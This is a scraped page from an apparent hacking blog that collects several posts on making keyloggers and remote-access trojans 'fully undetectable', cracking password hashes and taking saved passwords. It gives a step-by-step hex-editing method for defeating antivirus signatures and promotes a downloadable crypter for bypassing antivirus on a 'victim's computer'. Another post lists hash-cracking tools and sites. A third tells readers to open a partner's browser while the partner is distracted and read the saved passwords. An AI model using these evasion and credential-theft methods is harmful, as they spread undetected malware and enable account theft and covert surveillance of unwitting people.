Filed Under: CRYPTER , CRYPTOGRAPHY
Showing posts with label CRYPTOGRAPHY. Show all posts
Showing posts with label CRYPTOGRAPHY. Show all posts
Sunday, June 9, 2013
Make Keylogger 100% FUD | How To Bypass Antivirus Detection
Make Keylogger 100% FUD | How To Bypass Antivirus Detection
2013-06-09T12:21:00-07:00
wildrank
CRYPTER
|
CRYPTOGRAPHY
|
Comments
Posted by
wildrank
on
Sunday, June 09, 2013
On WildHacker, I have written so many tutorials on Keylogger, iStealer, Rats hacking tool. But the main problem is antivirus detection, most of the hacking tools are dectable. So to bypass antivirus detection we have to make that server file ( which is created using Keylogger, iStealer, Rats ) fully undectable. Few months back I had already explained you Hexing tutorial to make such virus file or server file fully undectable. Today in this tutorial i am going to explain one more way to make virus file undectable using BackTrack. Antivirus protects machines from malware, but not all of it. There are ways to pack malware to make it harder to detect. We'll use metasploit to render malware completely invisible to antivirus. So follow the step by step instruction to make a virus Fully Undetectable from all the antiviruses.
Filed Under: CRYPTER , CRYPTOGRAPHY
Thursday, November 29, 2012
How To Hide Files and Text In Image Format
How To Hide Files and Text In Image Format
2012-11-29T10:36:00-08:00
wildrank
CRYPTOGRAPHY
|
Comments
Posted by
wildrank
on
Thursday, November 29, 2012
Stegasaurus is a program that allows you to hide files and text in images.
Its applications are almost limitless and vary from sneakily storing your banking or login info to covert communication between government spies.
Images encrypted by the program act in the same way as a normal image file and can be edited, copied and uploaded without damaging the encrypted contents.
Click here to download Stegasaurus v1.1b
Features
- Command line file binder
- Text encrypter
- File encrypter
- Decrypter
- AES Encryption support
- Character scrambling (text only)
- Windows XP/Vista/7 32/64bit
- JRE 7 (download)
Screen Shots :
Text Encrypter :
File Encrypter :
Decrypter :
Filed Under: CRYPTOGRAPHY
Monday, July 16, 2012
How To Make Keylogger 100% FUD Using Hexing Technique
How To Make Keylogger 100% FUD Using Hexing Technique
2012-07-16T05:18:00-07:00
wildrank
CRYPTER
|
CRYPTOGRAPHY
|
Comments
Posted by
wildrank
on
Monday, July 16, 2012
I have already explained about Hexing tutorial which you can used to bypass antivirus detection of your keylog file.
Today in this article i am going to give short description of hexing tutorial because now days its difficult to get the working free crypter and most of the crypter are not free, So Hex editing is the only way to make our keylogger file fully undectable(FUD).
Don’t forget to Subscribe to our RSS feed
What is Hexing ?
Hexing is the the process of modifying application files using Hex editors (softwares used to edit files in hex format).
How Antivirus works ?
Antivirus works in a pretty complex way. To summarize its working in short, antivirus has virus definitions (also called signatures) stored in its database. While scanning a file, Antivirus searches for these virus definitions or signatures in a file and if it finds these signatures in a file, it flags these files as virus.
How to make virus undetectable?
When you have created the virus file, simply open the virus trojan file in Hex editor and search for signature which Antivirus has flagged as virus definition. We have to change this signature such that it will not affect the working of our trojan virus. Once you have successfully changed this signature, antivirus will not detect your trojan virus, thus making this virus trojan FUD.
Previously covered topics :
- How to make trojan virus undetectable by hex editor
- Hexing using Dsplit | Hide trojans from antivirus detection
- Bypass Antivirus Detection
- Hexing Reader Queries: How to compare two files in Hex Workshop
Things that are required for Hexing
- File Splitter
- Hex Editing Software
- Keylogger - Winspy / Sniperspy / Ardamax
- Antivirus
First make server file (Keylog file) using keylogger after that place that server server in a folder. Here I have created folder "A" and put that server(My server name is test.exe) file in it.
Okay now once you have placed the server in the folder lets scan it.
Here my test.exe file is infected.
Now open The File Splitter to split the file.
In the file splitter, browse to the test.exe file which you want to split and choose Custom size option.
Now File Splitter tells me that this test.exe is exactly 53,495 bytes and I want to split it into 4 pieces. So I divide 53,495 by 4, now place the number you got after dividing it and place it in the splitter custom size box like I have at the bottom. Now click on Split.
Now you will get the splitted files in the same directory like I have below which is in Folder "A".
Now scan each of them to figure out which file is infected and after that we have to split that infected file again. Now once you have figured out that infected file, make a new folder in same folder. Here I got test.exe.3 file infected, so I'm gonna make a new folder with name "3" .
Now again split that infected file test.exe.3 file into 4 pieces and change the output folder to 3 like I have in the picture below.
Now you will get splitted files inside folder named "3".
Now scan all the files to figure out which file is infected and after that we have to split that infected file again.
Now once you have figured out that infected file, make a new folder in same folder. Here I got test.exe.3.3 file infected, so I'm gonna make a new folder with name "3" again in folder "3". Once you made new folder named "3", again open up file splitter and browse to the file that got detected, mine was test.exe.3.3 and select the output directory to the folder we just made which was the folder named "3" which is in the folder named "3".
Now open that new folder which is "3" and scan the all files. Now once you have figured out that infected file, make a new folder in same folder. Here I got test.exe.3.3.4 file infected, so I'm gonna make a new folder and name it "4".
Now in file splitter pick the file that got detected which was test.exe.3.3.4 for me and choose the new folder we made with named "4".
Now lets scan all the new files and see which got detected. Once we find that infected file, open that infected file with the HEX editor and see if its still to big to figure out what we need to change.
Ok so here it's test.3.3.4.1 that we need to edit, do open it with hex editor,
Now the virus signature is in here in hex editor and its not that much hard now to find it out. I finger it out by looking for something that stands out or guesssing. After that you have to do is change a letter from capital to a lower case. here in my example I changed the word D to a lower case from the word DLLHOOKSTRUCT.
Now save it and exit and scan it. It should be undectable.
Finally its FUD .. Now you need to do compile it and scan it one more time and run it to test.
How to Complile : Here i will show you one example and after that you can figure out the rest by your own.
Now you see the splitter icon inside your folder, here in my example it is create_test.exe.3.3, click on it and it will recompile the file, and create one more file. Here in my example it create file "test.exe.3.3.4"
Now copy that newly created file which is "test.exe.3.3.4" and go back one directory and past it then it will ask you to replace it click yes and keep doing this till you go back to first directory. And your done.
After that scan one more time to check whether its FUD or not.
thats it friends..
Update : If you want to hack Gmail, Myspace and other email account passwords, please use the best Hacking Softwares,
- Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
- Remote Password Hacking Software - Sniperspy keylogger
- How To Hack Password Through Mobile
I hope now you can easily make your keylog file(server) fully undectable using this hexing technique without using any keylogger.If you have any problem in making your keylog(server) file 100% fully undectable(FUD) to bypass antivirus detection using hexing technique then, mention it in comments section.
HappY HaCkInG..
Filed Under: CRYPTER , CRYPTOGRAPHY
Saturday, February 11, 2012
Free Hash Cracking Software To Crack MD5, SHA1.. Hashes
Free Hash Cracking Software To Crack MD5, SHA1.. Hashes
2012-02-11T12:24:00-08:00
wildrank
CRYPTOGRAPHY
|
Comments
Posted by
wildrank
on
Saturday, February 11, 2012
Today I am writing this article on Hash Cracking to crack differents types of hashes like MD5, MD4, SHA1 etc. Hope this will helps all of you to crack MD5, SHA1, MYSQL hash. MD5 is one of most secure password encryption method available today. Actually, MD5 is not encryption, but a hash. Normally, encryption is two-way process ie you can decrypt encrypted password. But, MD5 generates hash and not encryption. And you cannot decrypt hash since hash generation is one-way process and it is not possible to decrypt hash.
MD5 hash cannot be decrypted. But, still we are able to crack MD5 password hash. In this article I have shared Hash Cracker software to crack MD5, SHA1, MYSQL hashes.
You might be interested in some of our other articles:
Follow the following steps to crack different hashes using Hash Cracking Software...
MD5 hash cannot be decrypted. But, still we are able to crack MD5 password hash. In this article I have shared Hash Cracker software to crack MD5, SHA1, MYSQL hashes.
You might be interested in some of our other articles:
- Download Free 100% FUD Crypter To Bypass Antivirus Detection
- Doxing Tutorial : Hack Hotmail and Facebook Account Password
- Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
- Remote Password Hacking Software - Sniperspy keylogger
- How To Hack Password Through Mobile
Free Hash Cracking Software To Crack MD5, SHA1.. Hashes
Follow the following steps to crack different hashes using Hash Cracking Software...
Filed Under: CRYPTOGRAPHY
Tuesday, October 18, 2011
Download Fud Crypter Sept : 2011 - Free 100% FUD Crypter To Bypass Antivirus Detection
Download Fud Crypter Sept : 2011 - Free 100% FUD Crypter To Bypass Antivirus Detection
2011-10-18T02:09:00-07:00
wildrank
CRYPTER
|
CRYPTOGRAPHY
|
KEYLOGGER
|
RATS
|
Comments
Posted by
wildrank
on
Tuesday, October 18, 2011
I have not posted any UD crypter since many days on wildgacker. So, today I am back with a another Fud Crypter software which can help you in bypassing antivirus on your victim’s computer. We create keyloggers and trojans, send them to victim and unfortunately, if our server is detectable, it gets deleted by antivirus present on victim computer. So, we will use this FUD Crypter software to bypass such deletion. So, read on to know more on Crypters - hacking software for bypassing antivirus detections. I have provided link for software download.
To knw more about FUD Crypter please read my previous article FUD crypter. Please refer it and come back here..
You might be interested in some of our other articles:
Note : Please NEVER scan the Stub.exe or your Crypted.exe on VirusTotal, Jotti, or VirScan!
Step 1: Download FUD Crypter to bypass antivirus.
Password: - www.wildhacker.com
Step 2: Run the downloaded FUD Crypter (GioCrypter.exe) to see: -
Scan Report : my-avscan.com
Detection Rate : 5 out of 45
Request : Please NEVER scan the Stub.exe or your Crypted.exe on VirusTotal, Jotti,VirScan or MetaScan!
Detections :
AVG - Clean
Acavir - Clean
Avast 5 -Clean
Avast -Clean
Avira -TR/Dropper.Gen
BitDefender -Clean
VirusBuster Internet Security -Clean
Clam Antivirus -Clean
COMODO Internet Security -Clean
DrWeb -Clean
eTrust-Vet -Win32/VBNA.A!generic
F-PROT Antivirus -Clean
F-Secure Internet Security -Gen:Trojan.Heur.VP2.gmW@aOMAfami
G Data -Gen:Trojan.Heur.VP2.gmW@aOMAfami (Engine-A)
IKARUS Security-Clean
Kaspersky Antivirus -Clean
McAfee -Clean
MS Security Essentials -Clean
ESET NOD32 -Trojan.Win32/Injector.DTC
Norman -Clean
Norton -Clean
Panda Security -Clean
A-Squared Security -Clean
Quick Heal Antivirus -Clean
Rising Antivirus -Clean
Solo Antivirus -Clean
Sophos -Clean
Trend Micro Internet Security -Clean
VBA32 Antivirus -Clean
Vexira Antivirus -Clean
Webroot Internet Security -Clean
Zoner AntiVirus -Clean
Ad-Aware -Clean
AhnLab V3 Internet Security -Clean
More AV's (Scanned Myself):
nProtect - Clean
K7AntiVirus - Clean
TheHacker - Clean
eSafe - Clean
ViRobot - Clean
Vipre - Clean
SUPERAntiSpyware - Clean
Antiy-AVL - Clean
Prevx - Clean
PCTools - Clean
Malwarebytes - Clean
Step 3: If you want to change the icon of Server file then check "Change Icon" checkbox and select the icon which you wants to set.
Note : DarkComet users uncheck Realign PE
Step 4: Select the server you want to crypt and hit on Build button.
Enjoy !
Update: Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use best Hacking software- Winspy Keylogger which is FUD(Fully UnDetectable). This is personally recommended keylogger from wildhacker.
I hope that FUD crypter will help you in bypassing antivirus detection on victim’s computer. You can use Rats or keyloggers to create servers. I have tried this UD Crypter and found it working perfect for my Cybergate. If you have faced any problem in using UD Crypter to bypass antivirus, please mention it in comments.
Enjoy HaCkInG............
To knw more about FUD Crypter please read my previous article FUD crypter. Please refer it and come back here..
You might be interested in some of our other articles:
- Airtel Free 3G Hack : Use Free Airtel 3G Internet For Your Computer
- PetanDrive : Store Upto 1000TB Data virtually On hard drive!
- Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
- Remote Password Hacking Software - Sniperspy keylogger
- How To Hack Password Through Mobile
Download Free 100% FUD Crypter To Bypass Antivirus
Follow the steps below to bypass antivirus using FUD Crypter: -Note : Please NEVER scan the Stub.exe or your Crypted.exe on VirusTotal, Jotti, or VirScan!
Step 1: Download FUD Crypter to bypass antivirus.
Password: - www.wildhacker.com
Step 2: Run the downloaded FUD Crypter (GioCrypter.exe) to see: -
Scan Report : my-avscan.com
Detection Rate : 5 out of 45
Request : Please NEVER scan the Stub.exe or your Crypted.exe on VirusTotal, Jotti,VirScan or MetaScan!
Detections :
AVG - Clean
Acavir - Clean
Avast 5 -Clean
Avast -Clean
Avira -TR/Dropper.Gen
BitDefender -Clean
VirusBuster Internet Security -Clean
Clam Antivirus -Clean
COMODO Internet Security -Clean
DrWeb -Clean
eTrust-Vet -Win32/VBNA.A!generic
F-PROT Antivirus -Clean
F-Secure Internet Security -Gen:Trojan.Heur.VP2.gmW@aOMAfami
G Data -Gen:Trojan.Heur.VP2.gmW@aOMAfami (Engine-A)
IKARUS Security-Clean
Kaspersky Antivirus -Clean
McAfee -Clean
MS Security Essentials -Clean
ESET NOD32 -Trojan.Win32/Injector.DTC
Norman -Clean
Norton -Clean
Panda Security -Clean
A-Squared Security -Clean
Quick Heal Antivirus -Clean
Rising Antivirus -Clean
Solo Antivirus -Clean
Sophos -Clean
Trend Micro Internet Security -Clean
VBA32 Antivirus -Clean
Vexira Antivirus -Clean
Webroot Internet Security -Clean
Zoner AntiVirus -Clean
Ad-Aware -Clean
AhnLab V3 Internet Security -Clean
More AV's (Scanned Myself):
nProtect - Clean
K7AntiVirus - Clean
TheHacker - Clean
eSafe - Clean
ViRobot - Clean
Vipre - Clean
SUPERAntiSpyware - Clean
Antiy-AVL - Clean
Prevx - Clean
PCTools - Clean
Malwarebytes - Clean
Step 3: If you want to change the icon of Server file then check "Change Icon" checkbox and select the icon which you wants to set.
Note : DarkComet users uncheck Realign PE
Step 4: Select the server you want to crypt and hit on Build button.
Enjoy !
Update: Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use best Hacking software- Winspy Keylogger which is FUD(Fully UnDetectable). This is personally recommended keylogger from wildhacker.
I hope that FUD crypter will help you in bypassing antivirus detection on victim’s computer. You can use Rats or keyloggers to create servers. I have tried this UD Crypter and found it working perfect for my Cybergate. If you have faced any problem in using UD Crypter to bypass antivirus, please mention it in comments.
Enjoy HaCkInG............
Filed Under: CRYPTER , CRYPTOGRAPHY , KEYLOGGER , RATS
Saturday, September 24, 2011
MD5 Cracker : How To Crack MD5, SHA1, MYSQL hash
MD5 Cracker : How To Crack MD5, SHA1, MYSQL hash
2011-09-24T02:47:00-07:00
wildrank
CRYPTOGRAPHY
|
Comments
Posted by
wildrank
on
Saturday, September 24, 2011
Today I am writing one more article on MD5, SHA1, MYSQL hash Cracker. Hope this will helps us my friends to crack MD5, SHA1, MYSQL hash. MD5 is one of most secure password encryption method available today. Actually, MD5 is not encryption, but a hash. Normally, encryption is two-way process ie you can decrypt encrypted password. But, MD5 generates hash and not encryption. And you cannot decrypt hash since hash generation is one-way process and it is not possible to decrypt hash.
MD5 hash cannot be decrypted. But, still we are able to crack MD5 password hash. In this article I have shared MD5, SHA1, MYSQL hash cracker software to crack MD5, SHA1, MYSQL hashes.
You might be interested in some of our other articles:
Steps to Cracked MD5, SHA1, MYSQL Hash.
Step 1: Free Download MD5, SHA1, MYSQL hash cracker software to crack MD5, SHA1, MYSQL hash.
Password: www.wildhacker.com
Step 2: Extract and run this "ArxFuckingHash.exe " on your computer to see:
Step 3: Insert your hast string and hit on "Add Hast Button",
Step 4: Now Select Hash string and click on Sart button to crack MD5, SHA1, MYSQL hashes.
Step 5: You will get password for those hash string in few minutes,
Benefits:
how to decrypt MD5, SHA1, MYSQL hash and MD5, SHA1, MYSQL password
using SHA1, MYSQL, MD5 decrypter software. If you have any problem in using this SHA1, MYSQL,MD5 decrypter software to decrypt SHA1, MYSQL, MD5 hash and MD5 password, please mention it in comments.
Enjoy SHA1, MYSQL, MD5 decrypter to decrypt SHA1, MYSQL, MD5 password hashes...
MD5 hash cannot be decrypted. But, still we are able to crack MD5 password hash. In this article I have shared MD5, SHA1, MYSQL hash cracker software to crack MD5, SHA1, MYSQL hashes.
You might be interested in some of our other articles:
- Airtel Free 3G Hack : Use Free Airtel 3G Internet
- Unlock Idea 3G NetSetter Modem
- Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
- Remote Password Hacking Software - Sniperspy keylogger
- How To Hack Password Through Mobile
How To Crack MD5, SHA1, MYSQL Hash String
Steps to Cracked MD5, SHA1, MYSQL Hash.
Step 1: Free Download MD5, SHA1, MYSQL hash cracker software to crack MD5, SHA1, MYSQL hash.
Password: www.wildhacker.com
Step 2: Extract and run this "ArxFuckingHash.exe " on your computer to see:
Step 3: Insert your hast string and hit on "Add Hast Button",
Step 4: Now Select Hash string and click on Sart button to crack MD5, SHA1, MYSQL hashes.
Step 5: You will get password for those hash string in few minutes,
Benefits:
- Checks in 10 databases at once
- Searches md5, sha1, mysql.
- Possible to edit server config (servers.ini), you can create your own DB list.
- Great interface.
- Can search for multiple hashes at once.
- Create md5 of a string, or file.
- Build in checker of working/nonworking services.
- Possible to edit service settings viewing the web page and source.
how to decrypt MD5, SHA1, MYSQL hash and MD5, SHA1, MYSQL password
using SHA1, MYSQL, MD5 decrypter software. If you have any problem in using this SHA1, MYSQL,MD5 decrypter software to decrypt SHA1, MYSQL, MD5 hash and MD5 password, please mention it in comments.
Enjoy SHA1, MYSQL, MD5 decrypter to decrypt SHA1, MYSQL, MD5 password hashes...
Filed Under: CRYPTOGRAPHY
Thursday, September 15, 2011
Free MD5 Decrypter, SHA1 Decrypter Hash Cracking Sites
Free MD5 Decrypter, SHA1 Decrypter Hash Cracking Sites
2011-09-15T04:12:00-07:00
wildrank
CRYPTOGRAPHY
|
MISCELLANEOUS
|
Comments
Posted by
wildrank
on
Thursday, September 15, 2011
Hello Guys, previously on wildhacker, I wrote an article on MD5 Decrypter, But unfortunately its does not work for my some visitor, also that software takes so much time for cracking hash.So now, I am adding one more article on Cryptography - MD5 Decrypter, SHA1 Decrypter. Hope this will helps us my friends.
In this article I am posting list of site for decrypting MD5, SHA1 hashes.
You might be interested in some of our other articles:
So friends, I hope above sites will help you to decrypt MD5 and SHA1 hash and SHA1 / MD5 password
using above sites.
Enjoy MD5 and MD4 decrypter sites to decrypt MD5 and MD4 password hashes...
In this article I am posting list of site for decrypting MD5, SHA1 hashes.
You might be interested in some of our other articles:
- MD5 DECRYPTER : How to Decrypt MD5 HASH, MD5 Password
- How to hack and crack IDM
- Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
- Remote Password Hacking Software - Sniperspy keylogger
- How To Hack Password Through Mobile
How to Decrypt MD5 Hash
- http://www.md5-db.com/index.php
- http://plain-text.info/add/
- http://www.tmto.org/
- https://hashcracking.ru/
- http://hashcrack.com/
- http://www.cryptohaze.com/addhashes.php
- http://md5.rednoize.com/
- http://isc.sans.org/tools/reversehash.html
- http://www.c0llision.net/webcrack.php
- http://md5cracker.tk/
- http://www.hashchecker.de/
- http://www.kinginfet.net/md5_cracker/
- http://lmcrack.com
- http://cracker.offensive-security.com/
- http://gdataonline.com/seekhash.php
- http://opencrack.hashkiller.com/
- http://passcracking.ru/
- http://md5decryption.com/
- http://authsecu.com/decrypter-dechif...r-hash-md5.php
- http://hash.insidepro.com/
- http://md5decrypter.com/
- http://md5pass.info/
- http://crackfor.me/
- http://www.xmd5.org/
- http://socialware.ru/md5_crack.php
- http://md5.my-addr.com/md5_decrypt-m...coder_tool.php
- http://www.md5cracker.com/
- http://www.md5decrypter.co.uk/
- http://md5.noisette.ch/
- http://md5.igrkio.info/md5-hash-database.html
- http://passcracking.com
- http://www.md5this.com
- http://www.md5this.com/submit-your-hash/index.php
- http://md5crack.com
- http://www.cmd5.org
- http://www.md5decrypt.com
- http://www.md5this.com/crack-it-/index.php
- http://www.miraclesalad.com/webtools/md5.php
- http://md5.my-addr.com/md5_decrypt-m...coder_tool.php
- http://md5-hash-online.waraxe.us
- http://ice.breaker.free.fr
- http://www.milw0rm.com/md5
- http://shm.hard-core.pl/md5
- http://shm.hard-core.pl
- http://www.hashchecker.com
- http://md5.benramsey.com
- http://md5.altervista.org
- http://www.passcracking.ru
- http://www.securitystats.com/tools/hashcrack.php
- http://www.xmd5.org/index_en.htm
- http://hashchecker.com
- http://www.netmd5crack.com
- http://md5.sh4ka.fr
- http://74.52.200.226/~b4ck/passhash/index.php
- http://www.tmto.org/
- http://md5.rednoize.com
- http://nz.md5.crysm.net
- http://us.md5.crysm.net
- http://www.xmd5.org
- http://gdataonline.com
- http://www.hashchecker.com
- http://passcracking.ru
- http://www.milw0rm.com/md5
- http://plain-text.info
- http://www.securitystats.com/tools/hashcrack.php
- http://www.schwett.com/md5/
- http://passcrack.spb.ru/
- http://shm.pl/md5/
- http://www.und0it.com/
- http://www.neeao.com/md5/passcracking.com
- http://md5.benramsey.com/
- http://www.md5decrypt.com/
- http://md5.khrone.pl/
- http://www.csthis.com/md5/index.php
- http://www.md5decrypter.com/
- http://www.md5encryption.com/
- http://www.md5database.net/
- http://md5.xpzone.de/
- http://md5.geeks.li/
- http://www.hashreverse.com/
- http://www.cmd5.com/english.aspx
- http://www.md5.altervista.org/
- http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
- http://alimamed.pp.ru/md5/
- http://md5crack.it-helpnet.de/index.php?op=add
- http://cijfer.hua.fi/
- http://shm.hard-core.pl/md5/
- http://www.mmkey.com/md5/home.asp
- http://www.thepanicroom.org/index.php?view=cracker
- http://rainbowtables.net/services/results.php
- http://rainbowcrack.com/
- http://www.securitydb.org/cracker/
- http://passwordsecuritycenter.com/in...roducts_ id=7
- http://0ptix.co.nr/md5
- https://www.astalavista.net/?cmd=rainbowtables
- http://www.pldsecurity.de/forum/md5.php
- http://www.xeons.net/genesis/
- http://hackerscity.free.fr/
- http://bisix.cogia.net/
- http://md5.allfact.info/
- http://bokehman.com/cracker/
- http://www.tydal.nu/article/md5-cr*ck/
- http://ivdb.org/search/md5/
- http://md5.netsons.org/
- http://md5.c.la/
- http://www.jock-security.com/md5_database/?page=cr*ck
- http://c4p-sl0ck.dyndns.org/cracker.php
- http://www.blackfiresecurity.com/tools/md5lib.php
How to Decrypt SHA1 Hash
- http://passcrack.spb.ru/
- http://www.hashreverse.com/
- http://rainbowcrack.com/
- http://www.md5encryption.com/
- http://www.shalookup.com/
- http://md5.rednoize.com/
- http://c4p-sl0ck.dyndns.org/cracker.php
- http://www.tmto.org/
- http://linardy.com/md5.php
- http://www.gdataonline.com/seekhash.php
- https://www.w4ck1ng.com/cracker/
- http://search.cpan.org/~blwood/digest-md5-reverse-1.3/
- http://www.hashchecker.com/index.php?_sls=search_hash
- http://www.rainbowcrack-online.com/
- http://schwett.com/md5/
- http://www.md5.org.cn/index_en.htm
- http://www.xmd5.org/index_en.htm
- http://nz.md5.crysm.net/
- http://us.md5.crysm.net/
- http://gdataonline.com/seekhash.php
- http://passcracking.ru/
- http://shm.pl/md5/
- http://www.neeao.com/md5/
- http://md5.benramsey.com/
- http://www.md5decrypt.com/
- http://md5.khrone.pl/
- http://www.csthis.com/md5/index.php
- http://www.md5decrypter.com/
- http://www.md5encryption.com/
- http://www.md5database.net/
- http://md5.xpzone.de/
- http://www.hashreverse.com/
- http://alimamed.pp.ru/md5/
- http://md5crack.it-helpnet.de/index.php?op=add
- http://shm.hard-core.pl/md5/
- http://rainbowcrack.com/
- http://passwordsecuritycenter.com/in...;products_id=7
- https://www.astalavista.net/?cmd=rainbowtables
- http://ice.breaker.free.fr/
- http://www.md5this.com/
- http://hackerscity.free.fr/
- http://md5.allfact.info/
- http://bokehman.com/cracker/
- http://www.tydal.nu/article/md5-cr*ck/
- http://passcracking.com/
- http://ivdb.org/search/md5/
- http://md5.netsons.org/
- http://md5.c.la/
- http://www.md5-db.com/index.php
- http://md5.idiobase.de/
- http://md5search.deerme.org/
- http://sha1search.com/
So friends, I hope above sites will help you to decrypt MD5 and SHA1 hash and SHA1 / MD5 password
using above sites.
Enjoy MD5 and MD4 decrypter sites to decrypt MD5 and MD4 password hashes...
Filed Under: CRYPTOGRAPHY , MISCELLANEOUS
Saturday, September 10, 2011
How To Get Email Account Passwords From Google Chrome Browser
How To Get Email Account Passwords From Google Chrome Browser
2011-09-10T11:48:00-07:00
wildrank
CRYPTOGRAPHY
|
MISCELLANEOUS
|
Comments
Posted by
wildrank
on
Saturday, September 10, 2011
Hello Guys, in our previous article we learned How To Unlock Various 3G USB Modems, Today I am gonna to share you a method to get email account password from Google Chrome Browser. This tutorial is most usefull for newbies.
I think this tutorials will helps my most of my visitors because most of them wants only his / her Girlfriend or Boyfriends password. So ... Lets say you think/know your Girlfriend / Boyfriends is cheating on you but you need proof. Well first go hangout with her/him at her/his house or where ever she/he uses the computer. When she's/he's distracted with something else here's what you do.............
You might be interested in some of our other articles:
Step 2: Then go to options. Click on Personal Stuff. That is where the red square is in the picture below.
Step 3: Now click on Manage saved passwords. It is in the red square below.
Step 4: You will get a screen like the one below.
Step 5: Now click on the dots at the end and click show like the picture below.
That's it there's the persons password right there the good thing about this is you can do this in less than a minute. Thanks for reading hope you learned something.
So friends, this is a short tutorial on how to get email account passwords from Google chrome Browser. I guess will this software help you to get your victim password.If you have any querries about How To Get Email Account Passwords From Google Chrome Browser then drop it in comments below.
EnJoY HaCkInG..............
I think this tutorials will helps my most of my visitors because most of them wants only his / her Girlfriend or Boyfriends password. So ... Lets say you think/know your Girlfriend / Boyfriends is cheating on you but you need proof. Well first go hangout with her/him at her/his house or where ever she/he uses the computer. When she's/he's distracted with something else here's what you do.............
You might be interested in some of our other articles:
- Password Hacking : Sniperspy keylogger For Mac Operating System
- 25+ free Rapidshare, Megaupload, Filesonic Premium
- Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
- Remote Password Hacking Software - Sniperspy keylogger
- How To Hack Password Through Mobile
Get Email Account Passwords From Google Chrome
Step 1: First click the wrench at the top of the page.Step 2: Then go to options. Click on Personal Stuff. That is where the red square is in the picture below.
Step 3: Now click on Manage saved passwords. It is in the red square below.
Step 4: You will get a screen like the one below.
Step 5: Now click on the dots at the end and click show like the picture below.
That's it there's the persons password right there the good thing about this is you can do this in less than a minute. Thanks for reading hope you learned something.
So friends, this is a short tutorial on how to get email account passwords from Google chrome Browser. I guess will this software help you to get your victim password.If you have any querries about How To Get Email Account Passwords From Google Chrome Browser then drop it in comments below.
EnJoY HaCkInG..............
Filed Under: CRYPTOGRAPHY , MISCELLANEOUS
Monday, July 4, 2011
MD5 DECRYPTER : HOW TO DECRYPT MD5 HASH, MD5 PASSWORD july 2011
MD5 DECRYPTER : HOW TO DECRYPT MD5 HASH, MD5 PASSWORD july 2011
2011-07-04T02:29:00-07:00
wildrank
CRYPTOGRAPHY
|
Comments
Posted by
wildrank
on
Monday, July 04, 2011
Previously, I wrote an article on MD5 Decrypter and password encryption.But unfortunately its does not work for my some visitor,So now, I am adding one more article on Cryptography - MD5 Decryption,Hope this will helps us my friends.
You might be interested in some of our other articles:
2 : It is a zip file, so I suggest downloading 7zip. Extract all of the files to one folder.
It should look similar to this.
For the purpose of this tutorial, I will be cracking this hash: "6dcd0f272fbb7f6f8ff3a8a5e96c45aa:Ws)", which is formatted as "Hash:Salt", and is from VBulletin 4.x.x.
3 : Open up notepad, paste in the Hash and salt, and save it anywhere on your computer, preferably in the same folder as Password Pro.
4 : Open up Password Pro and go to "File->Import"
5 : Find the place where you saved the text file with the hash inside of it, and open it.
Fill in the boxes as such.
Note: The bottom is the formatting of the hash and salt in the text file, and the top is the algorithm for VBulletin 4.x
6 : Now, go to "Audit->Preliminary Attack"
(For this hash, as it is simple, it should probably crack it with just this.)
7 : Hit the start button, and watch it go.
If, in the case that a Preliminary Attack does not work, just repeat the previous steps with a Rainbow Attack (If you have a Rainbow Table), a Simple Dictionary Attack, or a Brute Force Attack.
So friends, I hope you will now get all basics on
how to decrypt MD5 hash and MD5 password
using MD5 decrypter services. If you have any problem in using this MD5 decrypter services to decrypt MD5 hash and MD5 password, please mention it in comments.
Enjoy MD5 decrypter to decrypt MD5 password hashes...
You might be interested in some of our other articles:
- HOW TO DECRYPT MD5 HASH, MD5 PASSWORD
- FREE FILESERVE, FILESONIC,WUPLOAD PREMIUM LINK GENERATOR
- HACKING MYSPACE,FACEBOOK,GMAIL,YAHOO ACCOUNT PASSWORDS BY WINSPY KEYLOGGER
- REMOTE PASSWORD HACKING SOFTWARE - SNIPERSPY
- HOW TO SPY / SCAN / HACK A CELLPHONE WITH MOBILE SPY
MD5 is not an encryption, and therefore cannot be decrypted, only cracked
Steps to Cracked MD5 Hash, MD5 Password.
1 : First off, download "Password Pro" from here.2 : It is a zip file, so I suggest downloading 7zip. Extract all of the files to one folder.
It should look similar to this.
For the purpose of this tutorial, I will be cracking this hash: "6dcd0f272fbb7f6f8ff3a8a5e96c45aa:Ws)", which is formatted as "Hash:Salt", and is from VBulletin 4.x.x.
3 : Open up notepad, paste in the Hash and salt, and save it anywhere on your computer, preferably in the same folder as Password Pro.
4 : Open up Password Pro and go to "File->Import"
5 : Find the place where you saved the text file with the hash inside of it, and open it.
Fill in the boxes as such.
Note: The bottom is the formatting of the hash and salt in the text file, and the top is the algorithm for VBulletin 4.x
6 : Now, go to "Audit->Preliminary Attack"
(For this hash, as it is simple, it should probably crack it with just this.)
7 : Hit the start button, and watch it go.
If, in the case that a Preliminary Attack does not work, just repeat the previous steps with a Rainbow Attack (If you have a Rainbow Table), a Simple Dictionary Attack, or a Brute Force Attack.
So friends, I hope you will now get all basics on
how to decrypt MD5 hash and MD5 password
using MD5 decrypter services. If you have any problem in using this MD5 decrypter services to decrypt MD5 hash and MD5 password, please mention it in comments.
Enjoy MD5 decrypter to decrypt MD5 password hashes...
Filed Under: CRYPTOGRAPHY
Monday, April 11, 2011
Free 100% FUD Crypter: Hack MSN, hotmail Gmail password
Free 100% FUD Crypter: Hack MSN, hotmail Gmail password
2011-04-11T11:02:00-07:00
wildrank
CRYPTER
|
CRYPTOGRAPHY
|
KEYLOGGER
|
Comments
Posted by
wildrank
on
Monday, April 11, 2011
I have already written about Crypter in my previous article Crypter. I have mentioned about antiviruses detecting keylog file as hacking softwares (viruses) and hence, hacker has to use Crypters to avoid antivirus detection for keylog file. So, read on to know more on Crypters - hacking software for bypassing antivirus detections. I have provided link for software download.
What is Crypter???
As said above, Crypter is free software used to hide our viruses, RATs or any keylogger from antiviruses so that they are not detected and deleted by antiviruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antivirus work by splitting source code of application and then search for certain string within source code.
If antivirus detects any certain malicious strings, it either stops scan or deletes the file as virus from system.
What does Crypter do???
